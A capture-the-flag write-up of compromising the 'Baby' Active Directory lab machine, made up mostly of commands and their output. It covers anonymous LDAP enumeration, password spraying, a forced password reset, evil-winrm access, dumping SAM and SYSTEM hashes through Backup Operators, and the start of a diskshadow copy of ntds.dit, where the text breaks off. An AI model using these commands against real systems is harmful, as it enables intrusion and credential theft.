Initial information
The port scan shows a textbook domain controller and nothing else: DNS (53), Kerberos and kpasswd (88/464), RPC (135/593), SMB (139/445), LDAP/LDAPS and global catalog (389/636/3268/3269), RDP (3389), WinRM (5985) and ADWS (9389).
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ rustscan
Open 10.129.234.71:53
Open 10.129.234.71:88
Open 10.129.234.71:135
Open 10.129.234.71:139
Open 10.129.234.71:389
Open 10.129.234.71:464
Open 10.129.234.71:445
Open 10.129.234.71:593
Open 10.129.234.71:636
Open 10.129.234.71:3268
Open 10.129.234.71:3269
Open 10.129.234.71:3389
Open 10.129.234.71:5985
Open 10.129.234.71:9389
Basic information
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ cat start.sh
ip=10.129.234.71
domain=baby.vl
FQDN=BABYDC.baby.vl
Foothold
SMB and RPC null sessions had already been checked and gave nothing. Before brute-forcing usernames I checked LDAP first, and it accepts anonymous binds:
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ nxc ldap $ip -u "" -p ""
LDAP 10.129.234.71 389 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.234.71 389 BABYDC [+] baby.vl\:
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ ldapsearch -x -H ldap://$ip -b "" -s base
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#
#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=baby,DC=vl
ldapServiceName: baby.vl:babydc$@BABY.VL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: MaxPreAuthReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=baby,DC=vl
serverName: CN=BABYDC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=baby,DC=vl
schemaNamingContext: CN=Schema,CN=Configuration,DC=baby,DC=vl
namingContexts: DC=baby,DC=vl
namingContexts: CN=Configuration,DC=baby,DC=vl
namingContexts: CN=Schema,CN=Configuration,DC=baby,DC=vl
namingContexts: DC=DomainDnsZones,DC=baby,DC=vl
namingContexts: DC=ForestDnsZones,DC=baby,DC=vl
isSynchronized: TRUE
highestCommittedUSN: 118878
dsServiceName: CN=NTDS Settings,CN=BABYDC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=baby,DC=vl
dnsHostName: BabyDC.baby.vl
defaultNamingContext: DC=baby,DC=vl
currentTime: 20250919021248.0Z
configurationNamingContext: CN=Configuration,DC=baby,DC=vl
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
nxc's user enumeration over the same anonymous bind also surfaces a hint in one account's description field:
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ nxc ldap $ip -u "" -p "" --users
LDAP 10.129.234.71 389 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.234.71 389 BABYDC [+] baby.vl\:
LDAP 10.129.234.71 389 BABYDC [*] Enumerated 9 domain users: baby.vl
LDAP 10.129.234.71 389 BABYDC -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.234.71 389 BABYDC Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.129.234.71 389 BABYDC Jacqueline.Barnett 2021-11-21 10:11:03 0
LDAP 10.129.234.71 389 BABYDC Ashley.Webb 2021-11-21 10:11:03 0
LDAP 10.129.234.71 389 BABYDC Hugh.George 2021-11-21 10:11:03 0
LDAP 10.129.234.71 389 BABYDC Leonard.Dyer 2021-11-21 10:11:03 0
LDAP 10.129.234.71 389 BABYDC Connor.Wilkinson 2021-11-21 10:11:08 0
LDAP 10.129.234.71 389 BABYDC Joseph.Hughes 2021-11-21 10:11:08 0
LDAP 10.129.234.71 389 BABYDC Kerry.Wilson 2021-11-21 10:11:08 0
LDAP 10.129.234.71 389 BABYDC Teresa.Bell 2021-11-21 10:14:37 0 Set initial password to BabyStart123!
But that password is not Teresa.Bell's, and spraying it against the users listed above found no reuse either. It must be valid for someone, so the next step is to enumerate the users nxc missed, starting with a full anonymous dump of the domain naming context:
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ ldapsearch -H ldap://$ip -x -b "DC=baby,DC=vl" > ldap-anonymous
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ cat ldap-anonymous | grep CN=*
dn: CN=Administrator,CN=Users,DC=baby,DC=vl
dn: CN=Guest,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Guest,CN=Users,DC=baby,DC=vl
memberOf: CN=Guests,CN=Builtin,DC=baby,DC=vl
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=krbtgt,CN=Users,DC=baby,DC=vl
dn: CN=Domain Computers,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Domain Computers,CN=Users,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Domain Controllers,CN=Users,DC=baby,DC=vl
dn: CN=Schema Admins,CN=Users,DC=baby,DC=vl
dn: CN=Enterprise Admins,CN=Users,DC=baby,DC=vl
dn: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Domain Admins,CN=Users,DC=baby,DC=vl
dn: CN=Domain Users,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Domain Users,CN=Users,DC=baby,DC=vl
memberOf: CN=Users,CN=Builtin,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Domain Guests,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Domain Guests,CN=Users,DC=baby,DC=vl
memberOf: CN=Guests,CN=Builtin,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
member: CN=Administrator,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
distinguishedName: CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
member: CN=Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
member: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
member: CN=Domain Admins,CN=Users,DC=baby,DC=vl
member: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
member: CN=Enterprise Admins,CN=Users,DC=baby,DC=vl
member: CN=Schema Admins,CN=Users,DC=baby,DC=vl
member: CN=Domain Controllers,CN=Users,DC=baby,DC=vl
member: CN=krbtgt,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
dn: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Protected Users,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Protected Users,CN=Users,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Key Admins,CN=Users,DC=baby,DC=vl
dn: CN=Enterprise Key Admins,CN=Users,DC=baby,DC=vl
dn: CN=DnsAdmins,CN=Users,DC=baby,DC=vl
distinguishedName: CN=DnsAdmins,CN=Users,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
distinguishedName: CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=dev,CN=Users,DC=baby,DC=vl
member: CN=Ian Walker,OU=dev,DC=baby,DC=vl
member: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
member: CN=Hugh George,OU=dev,DC=baby,DC=vl
member: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
member: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
distinguishedName: CN=dev,CN=Users,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
distinguishedName: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
memberOf: CN=dev,CN=Users,DC=baby,DC=vl
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
distinguishedName: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
memberOf: CN=dev,CN=Users,DC=baby,DC=vl
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Hugh George,OU=dev,DC=baby,DC=vl
distinguishedName: CN=Hugh George,OU=dev,DC=baby,DC=vl
memberOf: CN=dev,CN=Users,DC=baby,DC=vl
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
distinguishedName: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
memberOf: CN=dev,CN=Users,DC=baby,DC=vl
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Ian Walker,OU=dev,DC=baby,DC=vl
dn: CN=it,CN=Users,DC=baby,DC=vl
member: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
member: CN=Teresa Bell,OU=it,DC=baby,DC=vl
member: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
member: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
member: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
distinguishedName: CN=it,CN=Users,DC=baby,DC=vl
memberOf: CN=Remote Management Users,CN=Builtin,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
distinguishedName: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
memberOf: CN=it,CN=Users,DC=baby,DC=vl
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
distinguishedName: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
memberOf: CN=it,CN=Users,DC=baby,DC=vl
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
distinguishedName: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
memberOf: CN=it,CN=Users,DC=baby,DC=vl
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
distinguishedName: CN=Teresa Bell,OU=it,DC=baby,DC=vl
memberOf: CN=it,CN=Users,DC=baby,DC=vl
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
ref: ldap://baby.vl/CN=Configuration,DC=baby,DC=vl
Filtering the dn: lines gives the full user list. Two objects, Ian Walker and Caroline Robinson, come back as a bare dn: without the distinguishedName/memberOf/objectCategory lines the others have: the anonymous bind can list them but not read their attributes, which is why nxc --users (it reads sAMAccountName) did not show them. Converted to the First.Last logon format the other accounts use:
Administrator
Guest
krbtgt
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell
Caroline.Robinson
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Ian.Walker
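The grep above works but is fragile: LDIF folds long values onto a continuation line that starts with a single space, so `grep CN=` loses the tail of wrapped distinguishedName values, and objects whose attributes the anonymous bind cannot read appear only as a bare dn: line. The script below is an added example for this writeup, not part of the original post. It parses a saved ldapsearch dump properly, separates readable user objects, dn-only objects and group members that never appeared as their own entry, and maps CNs to the First.Last logon convention seen in the nxc output. The sample LDIF is constructed from names on this page, and the First.Last mapping is an assumption to be confirmed by authenticating.

```python
"""Parse an anonymous ldapsearch LDIF dump into a usable user list.

Added example for this writeup (not part of the original post).
"""
import re
import sys

# Constructed sample in the shape of the ldap-anonymous dump above: one
# fully readable user, one group, one object the anonymous bind may list
# but not read (dn: only), and the ldapsearch trailer.  The folded
# distinguishedName (continuation line starting with a space) is real
# LDIF syntax and is exactly what a bare grep loses.
SAMPLE_LDIF = """\
# extended LDIF
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
objectClass: top
objectClass: person
objectClass: user
cn: Teresa Bell
description: Set initial password to BabyStart123!
distinguishedName: CN=Teresa Bell,OU=it,DC=baby,
 DC=vl
memberOf: CN=it,CN=Users,DC=baby,DC=vl
sAMAccountName: Teresa.Bell
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl

dn: CN=it,CN=Users,DC=baby,DC=vl
objectClass: top
objectClass: group
cn: it
member: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
member: CN=Teresa Bell,OU=it,DC=baby,DC=vl
member: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl

dn: CN=Caroline Robinson,OU=it,DC=baby,DC=vl

# search result
search: 2
result: 0 Success
"""

CN_RE = re.compile(r"^CN=([^,]+)", re.IGNORECASE)


def parse_ldif(text):
    """Return one {attr: [values]} dict per entry (attribute names lowercased).

    Comment lines are dropped, folded lines (leading space) are glued onto
    the previous value, and blocks without a dn: (the ldapsearch trailer)
    are discarded.  Base64 values ("attr:: ...") are kept undecoded.
    """
    entries, entry, last = [], {}, None

    def flush():
        nonlocal entry, last
        if "dn" in entry:
            entries.append(entry)
        entry, last = {}, None

    for raw in text.splitlines():
        if raw.startswith("#"):
            continue
        if not raw.strip():
            flush()
            continue
        if raw.startswith(" ") and last is not None:
            attr, i = last
            entry[attr][i] += raw[1:]
            continue
        name, sep, value = raw.partition(":")
        if not sep:
            continue
        name = name.strip().lower()
        entry.setdefault(name, []).append(value.lstrip(":").strip())
        last = (name, len(entry[name]) - 1)
    flush()
    return entries


def guess_sam(dn):
    """'CN=Caroline Robinson,OU=it,...' -> 'Caroline.Robinson'.

    Assumes the First.Last convention visible in the nxc --users output;
    it is a guess until a real logon confirms it.
    """
    m = CN_RE.match(dn)
    return ".".join(m.group(1).split()) if m else None


def enumerate_users(entries):
    """Split entries into readable users, dn-only objects and group members
    that never appeared as an entry of their own."""
    readable, dn_only, from_groups = {}, [], set()
    for e in entries:
        dn = e["dn"][0]
        if len(e) == 1:
            # Listable but not readable anonymously: nxc --users reads
            # sAMAccountName and therefore skips objects like this one.
            dn_only.append((dn, guess_sam(dn)))
            continue
        classes = {c.lower() for c in e.get("objectclass", [])}
        if "user" in classes and "computer" not in classes:
            sam = e.get("samaccountname") or [guess_sam(dn)]
            readable[sam[0]] = dn
        if "group" in classes:
            for member in e.get("member", []):
                if guess_sam(member):
                    from_groups.add(guess_sam(member))
    known = set(readable) | {g for _, g in dn_only if g}
    return {"readable": readable, "dn_only": dn_only,
            "missing_from_groups": sorted(from_groups - known)}


if __name__ == "__main__":
    # python3 ldif_users.py ldap-anonymous   (falls back to the sample)
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LDIF
    result = enumerate_users(parse_ldif(data))
    for sam in sorted(result["readable"]):
        print(f"{sam:25s} readable")
    for dn, guess in result["dn_only"]:
        print(f"{guess or dn:25s} dn only (attributes not readable anonymously)")
    for sam in result["missing_from_groups"]:
        print(f"{sam:25s} seen only as a group member")
```

Run it against the saved ldap-anonymous file instead of the sample to get the same three buckets for the real dump; the dn-only and group-member-only buckets are the ones worth spraying first, since they are precisely the accounts a quick nxc --users pass never showed.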
I am missing a screenshot here and could not find it again after finishing the box. In short, nxc reported that the password must be changed (STATUS_PASSWORD_MUST_CHANGE), and Caroline.Robinson's password is the BabyStart123! we found earlier. The forced change can be done remotely with smbpasswd:
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ smbpasswd -U Caroline.Robinson -r $ip
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user Caroline.Robinson
After the change the account authenticates, and it also has WinRM access: the it group is a member of Remote Management Users, as the LDAP dump showed.
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ nxc smb $ip -u $user2 -p 'SunnyDay2025!'
SMB 10.129.42.166 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domin:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.42.166 445 BABYDC [+] baby.vl\Caroline.Robinson:SunnyDay2025!
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ nxc winrm $ip -u $user2 -p 'SunnyDay2025!'
WINRM 10.129.42.166 5985 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
WINRM 10.129.42.166 5985 BABYDC [+] baby.vl\Caroline.Robinson:SunnyDay2025! (Pwn3d!)
Privilege escalation
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ evil-winrm -i $ip -u $user2 -p 'SunnyDay2025!'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
====================== ==============================================
baby\caroline.robinson S-1-5-21-1407081343-4001094062-1444647654-1115
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BABY\it Group S-1-5-21-1407081343-4001094062-1444647654-1109 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents>
Caroline is in Backup Operators. I first tried to have nxc's backup_operator module pull the hives remotely. Note what the module does, as its own output says: it starts RemoteRegistry over a named pipe, saves HKLM\SAM, SYSTEM and SECURITY into the SYSVOL share, which every domain user can read, and leaves the cleanup to a later domain-admin session.
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ nxc smb $ip -u $user2 -p 'SunnyDay2025!' -M backup_operator
SMB 10.129.42.166 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domin:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.42.166 445 BABYDC [+] baby.vl\Caroline.Robinson:SunnyDay2025!
BACKUP_O... 10.129.42.166 445 BABYDC [*] Triggering RemoteRegistry to start through named pipe...
BACKUP_O... 10.129.42.166 445 BABYDC Saved HKLM\SAM to \\10.129.42.166\SYSVOL\SAM
BACKUP_O... 10.129.42.166 445 BABYDC Saved HKLM\SYSTEM to \\10.129.42.166\SYSVOL\SYSTEM
BACKUP_O... 10.129.42.166 445 BABYDC Saved HKLM\SECURITY to \\10.129.42.166\SYSVOL\SECURITY
SMB 10.129.42.166 445 BABYDC [*] Copying "SAM" to "/home/wackymaker/.nxc/logs/BABYDC_10.129.42.166_2025-09-18_230638.SAM"
SMB 10.129.42.166 445 BABYDC [+] File "SAM" was downloaded to "/home/wackymaker/.nxc/logs/BABYDC_10.129.42.166_2025-09-18_230638.SAM"
SMB 10.129.42.166 445 BABYDC [*] Copying "SECURITY" to "/home/wackymaker/.nxc/logs/BABYDC_10.129.42.166_2025-09-18_230638.SECURITY"
SMB 10.129.42.166 445 BABYDC [+] File "SECURITY" was downloaded to "/home/wackymaker/.nxc/logs/BABYDC_10.129.42.166_2025-09-18_230638.SECURITY"
SMB 10.129.42.166 445 BABYDC [*] Copying "SYSTEM" to "/home/wackymaker/.nxc/logs/BABYDC_10.129.42.166_2025-09-18_230638.SYSTEM"
SMB 10.129.42.166 445 BABYDC [+] File "SYSTEM" was downloaded to "/home/wackymaker/.nxc/logs/BABYDC_10.129.42.166_2025-09-18_230638.SYSTEM"
BACKUP_O... 10.129.42.166 445 BABYDC Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
BACKUP_O... 10.129.42.166 445 BABYDC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BACKUP_O... 10.129.42.166 445 BABYDC DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BACKUP_O... 10.129.42.166 445 BABYDC $MACHINE.ACC:plain_password_hex:0d43eb797b84b0b440fbcb0d89fea14f8458970482b891850f2d2106c7c08447f2aa725adc71c58241311e5cebf5b75d43f5b541a43d583665ea4669bee9d1910c4ee1f4703104fccf44eb3ac2b3bb31ed1712e4fca7e416d3bd561993cd88a9750b0a04466909e51660a3fec061e9f5a51e8e10fe8c2653cd610140611ea9cd2fc1f436829369373bfb51fc5214666a9073e7a8124f4a07414ee0a7e565f24745f2ec5f134e7b7dca577813e5e82867ea33b16a1797c51703731eb1e4273db597063d62cb7f1c1a0faae15ab06aadea286b87cf6f2d28127fb948113c6b57c92a97c1aad038f958404b27f6e6d6fba5
BACKUP_O... 10.129.42.166 445 BABYDC $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:3d538eabff6633b62dbaa5fb5ade3b4d
BACKUP_O... 10.129.42.166 445 BABYDC dpapi_machinekey:0xe620195f1a5e2d71842bbad9877d7c3ca8a31eda
dpapi_userkey:0x026920834cd39c2e8ba9401c44a8869fe6be0555
BACKUP_O... 10.129.42.166 445 BABYDC NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
SMB 10.129.42.166 445 BABYDC [-] baby.vl\Administrator:8d992faed38128ae85e95fa35868bb43 SessionError
BACKUP_O... 10.129.42.166 445 BABYDC [*] Use the domain admin account to clean the file on the remote host
BACKUP_O... 10.129.42.166 445 BABYDC [*] netexec smb dc_ip -u user -p pass -x "del C:\Windows\sysvol\sysvol\SECURITY && del C:\Windows\sysvol\sysvol\SAM && del C:\Windows\sysvol\sysvol\SYSTEM"
But the Administrator hash pulled from SAM is the local account, not the domain Administrator, so it does not log in, and psexec as the local administrator fails too. Probably disabled.
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ evil-winrm -i 10.129.64.108 -u 'administrator' -H '8d992faed38128ae85e95fa35868bb43'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
So the route left is a shadow copy: diskshadow snapshots C: (the live ntds.dit is locked by the directory service), robocopy /B uses SeBackupPrivilege to read the file out of the snapshot, and reg save grabs the SYSTEM hive that holds the boot key needed to decrypt it.
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp> echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp> echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp> echo "create" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp> echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
